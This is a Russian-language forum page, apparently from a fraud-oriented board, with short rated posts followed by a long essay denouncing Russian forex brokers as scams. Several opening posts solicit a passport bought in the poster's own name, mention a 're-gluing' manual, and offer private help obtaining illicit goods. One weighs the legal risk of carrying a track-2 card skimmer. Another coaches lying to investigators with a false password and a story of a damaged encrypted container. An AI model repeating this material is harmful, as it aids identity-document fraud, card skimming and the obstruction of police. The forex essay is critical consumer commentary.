    Куплю паспорт на свои данные. Сроки. Стоимость.
  36. 1 балл
    Многое зависит от региона. Например, в Москве стоимость аренды примерна равна ипотечным выплатам. Естественно, первый год ипотека может превышать аренду, но потом по договору ежемесячная сумма платежа уменьшается.
  37. 1 балл
    интересно) впервые вижу мануал по переклею)
  38. 1 балл
  39. 1 балл
    VERTU, сколько бабла то хоть было?
  40. 1 балл
    Ну вот смотри найдут у тебя скимм на диб например в ЕС, поверь мне ты не отмажешься что это прототип электронного замка, как например в РУ или Белоре бывали такие случаи когда курьеров тормозили мусора и они так отмазывались, докажут очень просто прокатают карту и покажут что твой девайс записывает 2й трек Про ЮСУ почти во всех штатах есть статья за изготовление такого рода оборудовани и за доказухой они не постоят ониж пендосы :mrgreen:
  41. 1 балл
    Dmitriy.Anatolyevich, идейка появилась: дай им неправильный пасс/ключ, когда начнут предъявлять "какого хуя" клянись и божись что пароль был правильным, и ключ именно от него.... Затем натурально сделай фейспалм и скажи "-Бляя, я ведь ноутбук ронял, паходу хард сильно стукнулся и контейнер наебнулся, его теперь даже правильным ключом не открыть..." Ну и дальше немного погоревать по поводу потеренных данных, памятной личной переписки, уникальным фоткам итд...
  42. 1 балл
  43. 1 балл
    прочтите книгу Ю.М. Антоняна "Психология убийств"
  44. 1 балл
    возьми денег в долг Это быстро и без вложений И ПОбольше-Побольше)))))))))
  45. 1 балл
    Не так давно показывали в новостях как сотрудники ГИБДД вместе с журналистами тормозили дорогие машины и просто проверяли доки,так вот за короткий срок у них весь капот был завален....это я к тому что не очень то нарваться на такую акцию
  46. 1 балл
    VISA MAGNAT нужно перетереть, отписал в личку..
  47. 1 балл
    кому надо пишите в личку, все расскажу, покажу, помогу достать.
  48. 1 балл
    Продолжаю поиски, нахожу ответы за 2003-04гг, 2006г. Ничего конкретного.
  49. 1 балл
    Ходил смотреть в 3D. На сайте было написано что фильм снят по совершенно новой технологии, и я решил заценить. Пришел, сел, одел очки и начал смотреть. Скажу вам понравилось! Гильзы вылетали прямо из экрана, казалось что дети вот вот побегут под экран их собирать )))) В общем потрясный фильм! Всем советую сходить посмотреть! Только обязательно на 3D иначе не будет такого эффекта! В новой части монстров стало ещё больше, страшнее и здоровее... просто дух захватывает!
  50. 1 балл
    Иначе как чисто мошенническим этот рынок “финансовых” услуг назвать нельзя. На Западе жулики уже давно поняли, как при помощи Форекса быстро и безапелляционно облегчить карманы доверчивых “инвесторов” и “трейдеров”, однако Россия, полностью соответствуя своему имиджу страны “непуганных идиотов”, обошла всех и здесь. Наивность русских людей удивляет до такой степени, что стоит рассмотреть эту тему более подробно и аргументировано. Сначала немного теории и истории. На любом сайте фирм, предоставляющих услуги Форекса, можно прочитать, что объём этого международного рынка составляет триллионы долларов, основными валютами являются ......, и.т.д. Это действительно так. Мировой валютный рынок называется Interbank Market, и действующими лицами там являются все ведущие банки и правительства. Операции ведутся весьма активно. Есть ещё и третий участник. Это тысячи, как бы помягче сказать – “не очень умных людей”, многие из которых проживают в нашей с вами стране. Ибо давайте не будем сравнивать трейдера в лондонском Barclay’s, имеющего доступ ко всей ключевой информации, использующего профессиональные торговые терминалы, позволяющие видеть всю глубину рынка и обслуживаемого командой аналитиков, и Васю Пупкина, вдруг решившего, что со своими кровными пятьюстами долларами он скоро станет Джоржем Соросом. На вопрос, чем он занимается, Вася с гордостью отвечает: “Я – валютный трейдер. Ну, международный валютный рынок, я там работаю, понимаете?” Впрочем, Вася может не беспокоиться. Ни на какой валютный рынок его доллары не поступают. Они благополучно оседают в компаниях, предоставляющих ему форекс-услуги. Но об этом ниже. На Западе махинации с Форексом появились где-то в 70-х годах прошлого столетия. Схема была по сути такая же, как и сейчас в Интернете. Небольшие конторы заманивали доверчивых “клиентов”, расписывали им чудеса заработков на валютном рынке, где каждый, с небольшим капиталом, может получить маржу 1:100 и купить «ой сколько» любой валюты, а затем продать её дороже и баснословно заработать. Кратко объяснят, что к чему, подписал бумажку, что с рисками знаком, – и вперед. “Клиенты” находились в залах, где стояли дисплеи с котировками и графиками, а “торговля” велась путём заполнения бумажных ордеров и подачи их в окошко кассиру. В зале постоянно сновали “эксперты” (из бывших проигравших, находящиеся на содержании у жуликов), с солидным видом рассуждавшие на темы стратегий торговли, тем самым подогревавшие интерес у лохов. Такая вот игра в напёрсток. Естественно, “клиенты” думали, что участвовали на международном рынке. Нигде они не участвовали. Деньги за пределы конторы не выходили, проигрывались и доставались фирме. “Эксперты” укоризненно вздыхали. Говорили: “Ну да, правильно, ведь чтобы этому научиться нужно время. Да и капитала у тебя маловато. Что ты сделаешь с тысячей долларов? Вот если бы больше – тогда да. Обязательно начнёшь зарабатывать”. Естественно, “эксперты” имели свои проценты. На вопросы о личных успехах они отвечали весьма туманно или врали, не краснея. Пойди проверь. Вскоре изобрели, “о чудо!”, доверительное управление капиталом. Там вообще была красота. Раскрутить лоха на то, чтобы принёс, скажем, 20,000 долларов и отдал в управление “экспертам”. Через месяц показать ему левые бумажки, составленные на основе уже известных прошлых графиков. Из бумажек следовало, что счет вырос вдвое. Ликующий ”клиент”, представивший себя будущим владельцем разной недвижимости и дорогих автомобилей, несёт ещё денег. Занимали у знакомых, бывали случаи дома закладывали. Некоторое время лоху скармливали радужные липовые отчеты, а потом происходило что-то на рынке, и “клиенту” говорили: “Произошло нечто экстраординарное. Твои деньги, нет, не сгорели, они зависли, у тебя margin call. Не волнуйся, просто нужно ещё денег срочно принести. Главное — остаться в игре и всё поправится. Ты же видел, как быстро деньги зарабатываются”. И несли лохи, цепляясь за последнюю надежду. Какое-то время им опять показывали сфабрикованные отчеты, что дела поправлялись, а затем всё по-новому. “Добить” “клиента” тоже было очень важно. У лоха не должно было остаться сил на хождение по судам, и денег на дорогих адвокатов, он должен был хотеть только одного – забыть этот кошмар. Закон этого бизнеса гласил – “Настоящий развод “клиента” начинается не тогда, когда он принёс первые деньги (пусть даже много), а тогда, когда он их проиграл”. Первый долгожданный проигрыш открывал обширные возможности для дальнейших разводов. Мало проиграл – “Ну теперь ты понял, что к чему, пора работать по-настоящему”. Много проиграл – “Неси ещё, как можно больше. Всё назад сделаешь”. Всё проиграл – “Тоже не проблема. Становись “экспертом”. Ищи “клиентов”. Будешь иметь процент”. Русские форексники наших дней, вам это ничего не напоминает?! Лишь только развившись на Западе, такие конторы пошли в Азию – Сингапур, Пакистан, Индию, Филиппины. На Западе люди грамотные, знали не понаслышке, что такое рынок акций, облигаций, лицензирование брокерской деятельности. Там ловились в основном иммигранты. В Азии денег у людей меньше, но работать легче — народ наивнее, законодательство мутнее, откупиться проще в случае чего. Путь таких контор напоминал историю известных казино. Много жизней было сломано, семей пущено по миру и разрушено. Психологические травмы трудно переоценить. Все “клиенты”, часто люди неглупые и образованные, были в шоке, когда узнавали сколь нагло и просто их лишали кровных денег. Моральный урон от этого намного хуже, чем обыкновенный грабёж. Многие обращались в суд. Но туда форексники с улыбками приносили подписанные “клиентами” всё те же документы: “хочу торговать, с риском знаком, опытом обладаю (опыт – это то, чему научили “эксперты”)”. Иногда “клиенты” что-то отсуживали, но малую толику. Форексники никогда не унывали. К неизбежному общению с угрожающими, плачущими и умоляющими “клиентами” морально готовились заранее. Впрочем, конторы меру знали. Принеси им клиент миллион долларов, вряд ли бы взяли. Насчёт миллиона и в законопослушной Америке могли прийти угрюмые ребята и вежливо попросить заплатить, да ещё и с процентами. Да и человек, имеющий такие деньги, наверняка разбирается в финансах или найдёт, с кем посоветоваться. Нет. Ставка делалась на средние суммы с человека среднего класса. Максимум десятки тысяч долларов. Риск был минимален. В крайнем (или не крайнем, а заранее запланированном) случае можно было испариться с деньгами и открыть новую контору в другом месте, городе, а то и стране. Сажали в тюрьму форексников мало, редко и ненадолго. Выходили и занимались тем же. Выгодный бизнес, легкие деньги. С тех пор прошли годы. Что же изменилось в Форексе? По сути – ничего. Общая схема осталась той же. Изменилось главное. Появился Интернет и электронный трейдинг. Весьма продвинув рынок акций и других традиционных финансовых путем удаленного доступа, Интернет принёс валютным махинаторам много пользы. Даже престарелые “зубры” этого бизнеса быстро подружились с компьютером. Пришла “талантливая” молодежь. Форексникам открылись новые горизонты. Увеличился охват лоховской аудитории. Деньги электронным путём потекли быстрее. Да и общаться с “клиентами” путём удаленного доступа стало приятнее. Не нужно стало видеть их гнев, мольбы и сопли. Впрочем, не надо думать, что бизнес стал проще. Наоборот. Нужно всё технически организовать, содержать ораву хороших и надёжных (чтобы не болтали лишнего) программистов, способных в нужный момент манипулировать котировками, графиками и спредами. Также появилась необходимость наладить профессиональный маркетинг, персональное электронное общение с лохами. Конкуренция опять же, халявные деньги всем нужны. Но доходы того стоят. Форекс по-русски В Россию, если мне не изменяет память, Форекс пришёл году в 1994-м. Пришёл с Востока. Некая Сингапурская фирма открыла в Москве своё представительство. Первыми “гуру” русских лохов были китайцы. Кстати, китайцев в этом бизнесе очень большой процент по всему миру. Психологически, трудолюбивый китайский народ очень хорошо вписывается в Форекс. Безэмоциональные как кошки, не меняющиеся в лице при виде плачущих лохов, они готовы костьми лечь, только бы не отдать деньги назад. Итак, зерно, брошенное восточными друзьями на русскую почву, не сразу, но дало пышные всходы. Лохи, возомнившие себя высоко прибыльными пунктами обмена валюты, пошли табунами. Новые конторы возникали как грибы. Должен был пройти какой-то период, чтобы появились наши, доморощенные форексники-провайдеры. Как думаете, откуда они взялись? Ответ прост. Ну, конечно же, из бывших лохов, потерявших в одночасье свои кровные деньги. Некоторое время они, будучи неглупыми людьми, добросовестно штудировали весь этот бред, свято веря, будто бы, владея всеми премудростями теханализа и использования различных индикаторов, используя маржу 1:100 и поучившись у опытных “экспертов” можно было из постоянно теряющих стать постоянно зарабатывающими. Но, так как они были людьми умными, и многие неплохо знали математику, их постоянно мучили сомнения – “Как же так я никак не могу начать зарабатывать?! Ведь теоретически это возможно”!! И однажды их осенило – “Теоретически да. Но практически это возможно лишь для 1% участников игры. Для остальных 99% — невозможно”. А далее последовал ещё один ценный вывод – “Бизнес прекрасный! Мы просто не на той стороне! Не надо быть среди лохов отдающих деньги. Надо быть среди умных — эти деньги берущих”! И с тех не столь далёких пор история отечественного Форекса развивалась весьма динамично. Сначала, естественно для России, часто имело место банальное кидалово, когда фирмочки заманивали доверчивых “инвесторов” и ”трейдеров” и просто исчезали с деньгами. Сейчас это явление не столь распространено. “Клиенты” уже не столь склонны доверять молодым фирмам и предпочитают терять деньги с фирмами более-менее известными – 5-6 лет на “рынке”. Произошла некоторая консолидация и выбывание из игры мелких компаний. На том и порешили. Охарактеризовать нынешнее состояние русского Форекса лучше всего по пунктам, выделяя наиболее значимые моменты. 1. Рынок. Форекс не только в России, но и во всём мире не регулируем и не лицензирован. Это является предпосылкой к обману и обманывать просто, в отличие от, скажем рынка акций, который даже в нашей стране зарегулирован “от и до”. В ряде стран есть кое-какие лицензии для организаций и трейдеров, в них работающих, но к российскому Форексу это имеет мало отношения. Есть проблемы также с организациями, которые должны контролировать Форекс. В США, осознав опасность этих услуг для наивных простачков, Форексом вплотную занялись Комиссия по Торговле Товарными Фьючерсами (Commodity Futures Trading Commission) и ФБР. В тюрьму посадить за это не просто (форексники суют уже упомянутые документы, подписанные лохами), но компании закрывают и главных форексников ставят на публичную заметку. В России в этой сфере такой же бардак, как и во многих других. Те странные лицензии, которые могут показать форексники, про участников финансового рынка и.т.д., по сути ничего не значат и ни к чему не обязывают. Кстати, на сайте Форексклуба выставлена лицензия на “Организацию и содержание тотализаторов и игорных заведений”. Вот это уже ближе к делу! Так и говорили бы – “Играйте в нашем казино! Выиграете — заплатим”. Но нет, что мы видим? Лохам предлагается “работать на международных финансовых рынках”, “торговать”, и, о боже! — “зарабатывать”. Очевидно у форексных маркетологов проблема с пониманием значения глаголов русского языка. И тут мы подходим к пункту второму. 2. Маркетинг. Давно известно, даже в нашей стране, что при помощи хитрого маркетинга можно заставить человека сделать почти всё, что угодно. Хоть застрелиться. В маркетинге наши Форекс-провайдеры большие мастера. Считаю, что любой из известных западных маркетологов должен у них учиться, или хотя бы приехать пожать руку как профессионал профессионалу. Тонкое знание лоховской психологии нашими форексниками, и умение ей пользоваться вызовет восхищение у любого карточного шулера. Тут тебе и бесплатные семинары для начинающих лохов, и статьи в журналах, и реклама в прессе и Интернете, индивидуальные интервью-разводы и учебные курсы, преподаваемые “экспертами”, с важным видом рассуждающими о прошлых успехах и достижениях своих и своих знакомых. Даже появились “аналитики” валютного рынка, публикующие отчеты и комментарии. У любого разбирающегося человека материалы этих “аналитиков” вызывают гомерический хохот, но здесь нужно понимать, что цель – вовсе не анализ, а привлечения внимания, ибо всё это – маркетинг. Ещё мы видим форексные интернет-форумы, где “эксперты” (и даже владельцы компаний-провайдеров), зарегистрировавшись каждый под 20 именами устраивают полемику между собой. Один выступает: “Йену надо покупать!”. Другой ему: “Да, да, йену, а ещё фунт. Я уже купил и заработал, и.т.д.”. Цель – заставить лохов воспринимать Форекс как нечто серьезное. Все владельцы регулярно “пасут” свои форумы, чтобы, не дай бог, никто не выступил с правдой или критикой. Такого бунтаря быстро убирают с форума, предварительно заклевав со всех сторон. Форумы должны выглядеть радужно и серьёзно, как и весь остальной форекс-маркетинг. 3. Комиссионные. Форексники, называющие себя брокерами, “комиссионных” не берут. С точки зрения брокерской индустрии, это является абсурдом. Возникает вопрос: А как же они зарабатывают деньги? – Ах, за счет спрэда из пипсов, которые у них у всех разные?!! – Какого такого спрэда?? На любом финансовом рынке спрэд только один. Любой западный банковский валютный трейдер искренне бы удивился, если бы узнал, что существуют какие-то спрэды кроме тех, которые он видит на своих мониторах. Оказывается существуют. Котировки и спрэды у всех наших форексников – разные. Как, впрочем, и графики. Зарубежные поставщики данных (а больше этих данных нашим форексникам взять негде) в курсе всего этого, но уже давно махнули рукой на все махинации, предпочитая получать хоть какие-то деньги по подписке. Каждый из “клиентов” подтвердит, что, периодически на графиках и в котировках одной из компаний происходят движения, которых не было у других. Хотя, в последнее время компании-провайдеры постепенно приходят к мнению, что манипуляции с графиками и спрэдами не столь эффективны. “Клиенты” стали подкованными, тут же сверяются с графиками других компаний, устраивают скандалы, приходится извиняться. Да и вообще, большинство “клиентов” всё равно лохи, и так деньги просадят, так, что, математически, за прибыли можно не беспокоиться. 4. Деньги на рынке. Ни на какие международные рынки деньги клиентов не поступают. Деньги проигрываются лохами и остаются в распоряжении владельцев лохотронов. Лохам говорится, что компания осуществляет выход на рынок через западного брокера с мудреным зарубежным именем. На самом деле это – дешевые оффшоры зарегистрированные самими форексниками и далее этих “брокеров” деньги ни на какой рынок не идут. Довелось как-то поприсутствовать на налоговой проверке одной форексной конторы. Выглядело это примерно так: “Вот эти большие деньги, через западного брокера, ушли на международный рынок и нашими клиентами были там успешно проиграны. А вот эти жалкие пипсы мы заработали и с них платим налоги”. Смех, да и только. Не хотите ли знать, уважаемые читатели, сколько стоит реальный и легальный выход на международный рынок форекс? Попробуйте связаться с любым из западных крупных банков. Вы узнаете следующее: минимальный депозит от 7 миллионов долларов и плечо не более 1:4. Плечо, естественно, платное (около 10% годовых). В ответ на ваши возражения – А как же наши местные “брокеры” предлагают депозит от $500 и плечо 1:100 бесплатно?? – над вами вежливо посмеются. Вот и подумайте: Как вообще наши форексные конторы, родившиеся ни из чего, вообще могли начать своё существование. Или, может, у них были миллионы долларов, под которые они брали маржу 1:4 под проценты, а затем раздавали 1:100 всем желающим бесплатно??!! Наверное, они большие альтруисты и занимаются благотворительностью? На любом финансовом рынке сделка не может быть обезличенной. Всегда регистрируется, кто у кого что, за сколько и когда купил, и кто кому продал и историю этого можно посмотреть на двадцать лет назад. Пусть попробует ”клиент” русского форекса придти к своему “брокеру” и заявить: Ну-ка покажите мне банковские документы (да не из наших трёхлитровых, а законных, международных) в которых указывается, что я, Вова Иванов за свою тысячу долларов купил на международном рынке целых сто тысяч долларов, и какой это банк (беспроцентно!!!!) дал мне взаймы 99 тысяч долларов на неограниченное время?? А я проверю!! Этот “клиент” услышит что-нибудь типа: “Ну, вы понимаете............” А с распечатками сделок с логотипами местных “брокеров” и их оффшоров можно только сходить в туалет. Многие форексники даже не скрывают, что деньги ни на какой рынок не идут. На вопрос на эту темя часто можно услышать ответ типа: “Ну-у ... если деньги небольшие, скажем до 10 тысяч долларов, тогда не идут, а если большие, тогда.... наверное....может быть....”. За такой ответ на рынке акций, что за рубежом, что в России, любой брокер в лучшем случае лишился бы в лицензии, а в худшем оказался бы в наручниках. Ибо называется это – мошенничество. Либо ты брокер, и будь добр брокерствуй между рынком и клиентом, либо ты принимаешь ставки, собираешь с игроков деньги, которые хранятся у тебя, и называешь себя ТО-ТА-ЛИ-ЗА-ТОР, со всеми вытекающими отсюда правилами, отчетностью, налогами, и.т.д. Третьего не дано. Впрочем, дано. Это – наши форексники. Зарабатывающий на форексе “клиент” – полу-миф. Впрочем, такие люди иногда встречаются. Сначала, “брокеры” гордо несут этого “клиента” как знамя, всячески на него (или небольшую группу людей) ссылаясь, подводя к ним лохов и гордо показывая – Вот! Зарабатывают! Таких успешных “клиентов” призывают приводить и обучать новых лохов. Но вскоре от них быстро избавляются, ставя им заведомо невыполнимые условия. Ибо кому охота выплачивать прибыли из своих денег. Ведь ни на какой рынок деньги не идут. Сдается мне, что владельцы наших форексных “брокерских” контор, обалдев от потока лоховских денег, в счастливых снах представляют себя эдакими пауками, опутавшими электронными сетями всю страну. И в Москве у них лохи-“клиенты” и во Владивостоке. И находится такой паук в центре русского Форекса и текут к нему по электронным нитям паутины деньги. А обратно ничего не течет. Так, иногда блеснет маленькая денежная искорка, маленький лучик в обратном направлении, да тут же погаснет. И жить хорошо. И несут лохи деньги на “международный валютный рынок”, и деньги эти можно тут же тратить, не заботясь о том, что придется когда-нибудь отдавать. Или вкладывать в поиски новых лохов, открывать лоховские филиалы в разных городах, ибо желательно, чтобы поток “клиентов” не прекращался. А ещё, мне кажется, что сами большие форексники удивляются глубине лохизма своих “клиентов”. И как тому не удивляться. Лохизм этот превзошел все первоначальные ожидания. Умные люди, жители самой образованной страны в мире, страны математиков, физиков и инженеров несут и несут деньги, проигрывают их и ещё несут. Нет, чтобы просто сходить в казино или слотс, бац, и готово, денег нет, пошёл заниматься другими делами. Нет, эти люди мазохистически проводят часы и дни пялясь в компьютер, читают лоховские форекс-форумы, проводят вычисления и бурно обсуждают друг с другом особенности своих проигрышей. И, проиграв деньги, смущенно молчат, боясь себе самим и своим близким признаться, что они – лохи. Наверное, ими движут высокие мечты о финансовой независимости, вот-вот готовой материализоваться из кровных одной или нескольких тысяч долларов. Но бесплатный сыр, все прекрасно знают, где бывает.
×
×
  • Создать...